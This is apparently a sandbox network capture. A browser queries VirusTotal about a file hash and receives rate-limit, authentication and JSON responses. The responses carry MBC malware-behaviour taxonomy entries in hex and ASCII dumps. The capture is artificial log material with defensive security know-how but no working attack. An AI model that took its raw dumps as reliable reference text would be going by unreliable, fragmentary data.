                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 229e3086f25f092d52a43d0d4a2fd2a1
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 18372
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 41 50 45 20 53 61 6e 64 62 6f 78 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 62 6a 65 63 74 69 76 65 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 42 30 30 30 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 49 6d 70 61 63 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 69 6d 70 61 63 74 2f 52 45 41 44
                                                                                                                                                                                                                    Data Ascii: { "data": { "CAPE Sandbox": { "objectives": [ { "id": "OB0008", "name": "Impact", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/impact/READ
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 22 3a 20 22 44 65 6e 69 61 6c 20 6f 66 20 53 65 72 76 69 63 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 69 6d 70 61 63 74 2f 64 65 6e 69 61 6c 2d 6f 66 2d 73 65 72 76 69 63 65 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4d 61 6c 77 61 72 65 20 6d 61 79 20 6d 61 6b 65 20 61 20 6e 65 74 77 6f 72 6b 20 75 6e 61 76 61 69 6c 61 62 6c 65 2c 20 66 6f 72 20 65 78 61 6d 70 6c 65 2c 20 62 79 20 6c 61 75 6e 63 68 69 6e 67 20 61
                                                                                                                                                                                                                    Data Ascii: ": "Denial of Service", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/impact/denial-of-service.md", "description": "Malware may make a network unavailable, for example, by launching a
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC543INData Raw: 61 76 69 6f 72 20 69 73 20 72 65 6c 61 74 65 64 20 74 6f 20 48 54 54 50 20 63 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 2e 20 5c 6e 5c 6e 49 6e 73 74 65 61 64 20 6f 66 20 62 65 69 6e 67 20 6c 69 73 74 65 64 20 61 6c 70 68 61 62 65 74 69 63 61 6c 6c 79 2c 20 6d 65 74 68 6f 64 73 20 68 61 76 65 20 62 65 65 6e 20 67 72 6f 75 70 65 64 20 74 6f 20 62 65 74 74 65 72 20 66 61 63 69 6c 69 61 74 65 20 6c 61 62 65 6c 69 6e 67 20 61 6e 64 20 6d 61 70 70 69 6e 67 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 73 22 3a 20 5b 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: avior is related to HTTP communication. \n\nInstead of being listed alphabetically, methods have been grouped to better faciliate labeling and mapping.", "methods": [] }, {
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 65 74 29 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 70 72 6f 67 72 61 6d 6d 69 6e 67 20 69 6e 74 65 72 66 61 63 65 20 28 41 50 49 29 20 69 73 20 75 73 65 64 20 62 79 20 6d 61 6c 77 61 72 65 20 74 6f 20 69 6e 74 65 72 61 63 74 20 77 69 74 68 20 46 54 50 20 61 6e 64 20 48 54 54 50 20 70 72 6f 74 6f 63 6f 6c 73 20 74 6f 20 61 63 63 65 73 73 20 49 6e 74 65 72 6e 65 74 20 72 65 73 6f 75 72 63 65 73 2e 5c 6e 5c 6e 54 68 65 20 6d 65 74 68 6f 64 73 20 62 65 6c 6f 77 20 61 72 65 20 74 68 6f 73 65 20 6f 66 20 6d 6f 73 74 20 69 6e 74 65 72 65 73 74 20 69 6e 20 6d 61 6c 77 61 72 65 20 61 6e 61 6c 79 73 69 73 2e 20 44 65 74 61 69 6c 73 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 61 74 20 5b 31 5d 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: et) application programming interface (API) is used by malware to interact with FTP and HTTP protocols to access Internet resources.\n\nThe methods below are those of most interest in malware analysis. Details can be found at [1].",
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 20 20 20 22 6e 61 6d 65 22 3a 20 22 45 78 65 63 75 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 65 78 65 63 75 74 69 6f 6e 2f 52 45 41 44 4d 45 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 42 65 68 61 76 69 6f 72 73 20 74 68 61 74 20 65 6e 61 62 6c 65 20 6d 61 6c 77 61 72 65 20 74 6f 20 65 78 65 63 75 74 65 20 63 6f 64 65 20 6f 6e 20 61 20 73 79 73 74 65 6d 20 74 6f 20 61 63 68 69 65 76 65 20 61 20 76 61 72 69 65 74 79 20 6f 66 20 67 6f 61 6c 73 2e 22 2c 0a
                                                                                                                                                                                                                    Data Ascii: "name": "Execution", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/execution/README.md", "description": "Behaviors that enable malware to execute code on a system to achieve a variety of goals.",
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1280INData Raw: 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 49 6e 73 74 61 6c 6c 20 41 64 64 69 74 69 6f 6e 61 6c 20 50 72 6f 67 72 61 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 65 78 65 63 75 74 69 6f 6e 2f 69 6e 73 74 61 6c 6c 2d 61 64 64 69 74 69 6f 6e 61 6c 2d 70 72 6f 67 72 61 6d 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4d 61 6c 77 61 72 65 20
                                                                                                                                                                                                                    Data Ascii: 23", "name": "Install Additional Program", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/execution/install-additional-program.md", "description": "Malware
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 69 62 65 64 20 61 73 20 5c 75 32 30 31 63 73 69 6e 67 6c 65 20 73 74 61 67 65 5c 75 32 30 31 64 20 6f 72 20 5c 75 32 30 31 63 74 77 6f 20 73 74 61 67 65 2e 5c 75 32 30 31 64 20 57 68 69 6c 65 20 74 68 65 20 66 6f 72 6d 65 72 20 65 6d 62 65 64 73 20 74 68 65 20 6d 61 6c 69 63 69 6f 75 73 20 63 6f 64 65 20 69 6e 74 65 72 6e 61 6c 6c 79 2c 20 74 68 65 20 6c 61 74 74 65 72 20 69 6e 73 74 61 6c 6c 73 20 69 74 73 65 6c 66 20 62 65 66 6f 72 65 20 64 6f 77 6e 6c 6f 61 64 69 6e 67 20 61 64 64 69 74 69 6f 6e 61 6c 20 63 6f 64 65 20 66 72 6f 6d 20 61 20 72 65 6d 6f 74 65 20 6c 6f 63 61 74 69 6f 6e 20 5b 34 5d 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 73 22 3a 20 5b 5d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ibed as \u201csingle stage\u201d or \u201ctwo stage.\u201d While the former embeds the malicious code internally, the latter installs itself before downloading additional code from a remote location [4].", "methods": []
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 43 30 30 30 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 4d 65 6d 6f 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 6d 69 63 72 6f 2d 62 65 68 61 76 69 6f 72 73 2f 6d 65 6d 6f 72 79 2f 52 45 41 44 4d 45 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4d 69 63 72 6f 2d 62 65 68 61 76 69 6f
                                                                                                                                                                                                                    Data Ascii: { "id": "OC0002", "name": "Memory", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/memory/README.md", "description": "Micro-behavio
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1280INData Raw: 6e 20 46 69 6c 65 73 20 61 6e 64 20 44 69 72 65 63 74 6f 72 69 65 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 64 65 66 65 6e 73 65 2d 65 76 61 73 69 6f 6e 2f 68 69 64 64 65 6e 2d 66 69 6c 65 73 2d 61 6e 64 2d 64 69 72 65 63 74 6f 72 69 65 73 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4d 61 6c 77 61 72 65 20 6d 61 79 20 68 69 64 65 20 66 69 6c 65 73 20 61 6e 64 20 66 6f 6c 64 65 72 73 20 74 6f 20 61 76 6f 69 64 20 64
                                                                                                                                                                                                                    Data Ascii: n Files and Directories", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/defense-evasion/hidden-files-and-directories.md", "description": "Malware may hide files and folders to avoid d
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC1408INData Raw: 31 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 54 65 72 6d 69 6e 61 74 65 20 50 72 6f 63 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 6d 69 63 72 6f 2d 62 65 68 61 76 69 6f 72 73 2f 70 72 6f 63 65 73 73 2f 74 65 72 6d 69 6e 61 74 65 2d 70 72 6f 63 65 73 73 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4d 61 6c 77 61 72 65 20 74 65 72 6d
                                                                                                                                                                                                                    Data Ascii: 18", "name": "Terminate Process", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/process/terminate-process.md", "description": "Malware term


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    157192.168.2.164990874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC570OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 5f64d5f6de68b8d5ca2fb64f73b4efaf
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    158192.168.2.164990974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC966OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/mitre_format?link=true HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTE5NzI4NzI1NzktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjUwMg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC806INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 6142b9c336889b9689c043419f404a94
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 116
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC116INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "AuthenticationRequiredError", "message": "Authentication required" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    159192.168.2.164991074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC571OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 6ef8a2cd0ca8ea53c0d6dd63918ab6e8
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    160192.168.2.164991174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC963OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTY2NzkxNzI0NDctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjUwMw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:32 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 4d66c009e7c6de45971bc6d69382c8e4
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 159645
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:32 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
